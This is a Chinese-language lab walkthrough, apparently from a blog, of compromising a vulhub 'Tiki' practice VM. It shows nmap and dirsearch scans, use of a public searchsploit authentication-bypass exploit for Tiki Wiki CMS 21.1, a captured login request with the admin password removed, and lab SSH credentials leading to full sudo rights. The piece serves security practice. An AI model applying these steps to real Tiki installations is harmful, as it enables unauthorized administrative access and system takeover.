Scan

先arp-scan -l扫描附件主机ip

nmap -sS -sV -n -T4 -p- 192.168.93.132

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-03 20:25 CST

Nmap scan report for 192.168.93.132

Host is up (0.0013s latency).

Not shown: 65531 closed tcp ports (reset)

PORT    STATE SERVICE     VERSION

22/tcp  open  ssh         OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)

80/tcp  open  http        Apache httpd 2.4.41 ((Ubuntu))

139/tcp open  netbios-ssn Samba smbd 4.6.2

445/tcp open  netbios-ssn Samba smbd 4.6.2

MAC Address: 00:0C:29:3D:07:BF (VMware)

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 19.61 seconds

dirsearch扫描靶机ip

[20:44:47] 403 -  279B  - /.ht_wsr.txt

[20:44:47] 403 -  279B  - /.htaccess.bak1

[20:44:47] 403 -  279B  - /.htaccess.orig

[20:44:47] 403 -  279B  - /.htaccess.sample

[20:44:47] 403 -  279B  - /.htaccess_extra

[20:44:47] 403 -  279B  - /.htaccess_sc

[20:44:47] 403 -  279B  - /.htaccessBAK

[20:44:47] 403 -  279B  - /.htaccessOLD

[20:44:47] 403 -  279B  - /.htaccessOLD2

[20:44:47] 403 -  279B  - /.htaccess.save

[20:44:47] 403 -  279B  - /.htaccess_orig

[20:44:47] 403 -  279B  - /.html

[20:44:47] 403 -  279B  - /.htpasswd_test

[20:44:47] 403 -  279B  - /.htpasswds

[20:44:47] 403 -  279B  - /.htm

[20:44:47] 403 -  279B  - /.httr-oauth

[20:44:48] 403 -  279B  - /.php

[20:45:43] 200 -   42B  - /robots.txt

[20:45:45] 403 -  279B  - /server-status

[20:45:45] 403 -  279B  - /server-status/

[20:45:53] 301 -  315B  - /tiki  ->  http://192.168.93.132/tiki/

[20:45:53] 200 -  526B  - /tiki/doc/stable.version

访问192.168.93.132/tiki发现是tiki wiki cms初始页面,有登录入口

访问tiki/doc/stable.version,结果是一堆版本,也不知道靶机用的到底是哪个版本的cms

继续扫描192.168.93.132/tiki/ ,发现tiki/changelog.txt,进去发现有版本号21.1

用kali自带工具searchsploit搜索相关漏洞。

发现一个Tiki Wiki CMS Groupware 21.1 - Authentication Bypass,正好这个cms是21.1的

查看利用脚本内容searchsploit -m php/webapps/48927.py

运行脚本python 4* <host>

结果

python3 4* 192.168.93.132

Admin Password got removed.

Use BurpSuite to login into admin without a password

Admin Password got removed.

Use BurpSuite to login into admin without a password

Admin Password got removed.

Use BurpSuite to login into admin without a password

Admin Password got removed.

Use BurpSuite to login into admin without a password

Admin Password got removed.

Use BurpSuite to login into admin without a password

Admin Password got removed.

Use BurpSuite to login into admin without a password

Admin Password got removed.

Use BurpSuite to login into admin without a password

Admin Password got removed.

Use BurpSuite to login into admin without a password

Admin Password got removed.

Use BurpSuite to login into admin without a password

Admin Password got removed.

Use BurpSuite to login into admin without a password

Admin Password got removed.

Use BurpSuite to login into admin without a password

Admin Password got removed.

Use BurpSuite to login into admin without a password

提示用bp抓包去掉密码登录

POST /tiki/tiki-login.php HTTP/1.1

Host: 192.168.93.132

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate, br

Content-Type: application/x-www-form-urlencoded

Content-Length: 121

Origin: http://192.168.93.132

Connection: close

Referer: http://192.168.93.132/tiki/tiki-login.php

Cookie: PHPSESSID=iecm9rpfmkduvu74nmgd48k2tk; PHPSESSIDCV=04zHn53nqCLMqnyrzYRe7Q%3D%3D; javascript_enabled=y; local_tz=Asia%2FShanghai

Upgrade-Insecure-Requests: 1

ticket=izkMYy9ZWrHFDwo7M5oVc2l7rTR7Ys9kjI4dyjy9984&user=admin&pass=w&login=&stay_in_ssl_mode_present=y&stay_in_ssl_mode=n

在List Page页面的Credentials页面发现silky:Agy8Y7SPJNXQzqA

疑似ssh登录密码,尝试登录

这个竟然能直接提权了

Der Benutzer silky darf die folgenden Befehle auf ubuntu ausführen:

    (ALL : ALL) ALL

这意味着 silky 用户在 ubuntu 系统上具有完整的 sudo 权限,具体解读为:

(ALL : ALL) ALL:

第一个 ALL:silky 用户可以以 任何用户身份 运行命令。

第二个 ALL:silky 用户可以在 系统上的任何组 下运行命令。

第三个 ALL:silky 用户可以执行 所有命令。```

vulhub靶机的flag一般在/root目录或/root目录子目录下

Tiki靶机练习的更多相关文章

  1. CTF线下防御战 — 让你的靶机变成“铜墙铁壁”

    本文首发安全客,未经允许禁止转载.原文链接 一. 前言 随着CTF的普及,比赛的形式也有了越来越多的花样,对于线下赛来说,开始出现了安全加固或者防御战之类的环节,亦或者因为拿下靶机后不希望其他攻击者进 ...

  2. Ms17-010进行WEB提权之实践下某培训靶机服务器

    前言:该机器为某个其他培训机构的靶机,说实话在这里没炫耀啥,只是给各位学习Ms17010的同学指一条路,我原先也折腾这玩意儿好久,但是就是不行,最近才找到了出路,所以多写两篇文章,把各种需要注意的地方 ...

  3. metasploit利用漏洞渗透攻击靶机

    1.网络测试环境构建 首先需要先配置好一个渗透测试用的网络环境,包括如图1所示的运行Kali Linux系统的计算机,如图2所示的老师给的Windows Server 2000系统的计算机.这两台计算 ...

  4. web 攻击靶机解题过程

    sql注入靶机攻击过程请参考 https://pentesterlab.com/exercises/from_sqli_to_shell/course http://www.sohu.com/a/12 ...

  5. Fowsniff: 1靶机入侵

    一.信息收集 1.存活主机扫描 arp-scan  -l 发现192.168.1.13是目标靶机的IP地址 2.端口扫描 接下来用nmap神器来扫描目标IP地址,命令如下: root@kali2018 ...

  6. digitalworld.local: MERCY靶机入侵

    0x01 前言 MERCY是一个致力于PWK课程安全的靶机系统.MERCY是一款游戏名称,与易受攻击的靶机名称无关.本次实验是攻击目标靶机获取root权限并读系统目录中的proof.txt信息 靶机的 ...

  7. Moonraker:1靶机入侵

      0x01 前言 攻击Moonraker系统并且找出存在最大的威胁漏洞,通过最大威胁漏洞攻击目标靶机系统并进行提权获取系统中root目录下的flag信息. Moonraker: 1镜像下载地址: h ...

  8. FourAndSix: 2.01靶机入侵

      0x01 前言 FourAndSix2是易受攻击的一个靶机,主要任务是通过入侵进入到目标靶机系统然后提权,并在root目录中并读取flag.tx信息 FourAndSix2.镜像下载地址: htt ...

  9. Typhoon-v1.02 靶机入侵

      0x01 前言 Typhoon VM包含多个漏洞和配置错误.Typhoon可用于测试网络服务中的漏洞,配置错误,易受攻击的Web应用程序,密码破解攻击,权限提升攻击,后期利用步骤,信息收集和DNS ...

  10. Raven: 2靶机入侵

    0x00 前言 Raven 2是一个中等难度的boot2root 虚拟靶机.有四个flag需要找出.在多次被攻破后,Raven Security采取了额外措施来增强他们的网络服务器安全以防止黑客入侵. ...

随机推荐

  1. 阿里IM技术分享(五):闲鱼亿级IM消息系统的及时性优化实践

    本文由阿里闲鱼技术团队有攸分享,原题"向消息延迟说bybye:闲鱼消息及时到达方案",有修订和改动,感谢作者的分享. 1.引言 IM消息作为闲鱼用户重要的交易咨询工具,核心目标有两 ...

  2. Solution Set - “女孩是瑰宝我心动一丝不苟”

    目录 0.「NOI Simu.」静态顶树 1.「NOI Simu.」祖先 2.「NOI Simu.」睡眠 3.「JLOI 2008」「洛谷 P3881」CODES 4.「ARC 163A」Divide ...

  3. CDS标准视图:维护策略数据 I_MaintenanceStrategyData

    视图名称:维护策略数据 I_MaintenanceStrategyData 视图类型:基础视图 视图代码: 点击查看代码 @AbapCatalog.sqlViewName: 'IMAINTSTRATD ...

  4. h5 页面播放base64编码的audio数据

    例子: <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8 ...

  5. Spring Security 基于JWT的单点登陆(SSO)开发及原理解析

    JDK1.8Spring boot 2.xSpring Security 5.x 单点登录(Single Sign On),简称为SSO,是目前比较流行的企业业务整合的解决方案之一. SSO的定义是在 ...

  6. Qml 中实现任意角为圆角的矩形

    [写在前面] 在 Qml 中,矩形(Rectangle)是最常用的元素之一. 然而,标准的矩形元素仅允许设置统一的圆角半径. 在实际开发中,我们经常需要更灵活的圆角设置,例如只对某些角进行圆角处理,或 ...

  7. shell脚本中的循环(for循环,while循环)及break、continue的用法示例

    Shell脚本中也算是一门简易的编程语言了,当然循环是不能缺少的.常用到的循环有for循环和while循环.下面就分别介绍一下两种循环的结构. [for循环]: Shell脚本中的for循环示例: # ...

  8. LPN问题

    郁昱老师的某次讲座,记录一下! LWE和LPN: 1.LWE是模p的:噪音取自离散高斯分布 2.LPN是模2的:噪音取自伯努利分布 3.LPN很难构造同态加密方案 4.都可以分为判定型和搜索型

  9. Educational Codeforces Round 168 (Rated for Div. 2)

    题目链接:Educational Codeforces Round 168 (Rated for Div. 2) 总结:题目较简单,但是发挥很一般.A,B题一直读假题,卡了半个小时:C题用char存i ...

  10. [记录点滴]Ionic编译过程的研究

    [记录点滴]Ionic编译过程的研究 0x00 摘要 之前研究Ionic编译过程的笔记,发出来做个记录.当时是因为有些图片没有拷贝到应用中,所以需要调试编译过程. 0x01 入口 编译的入口在plat ...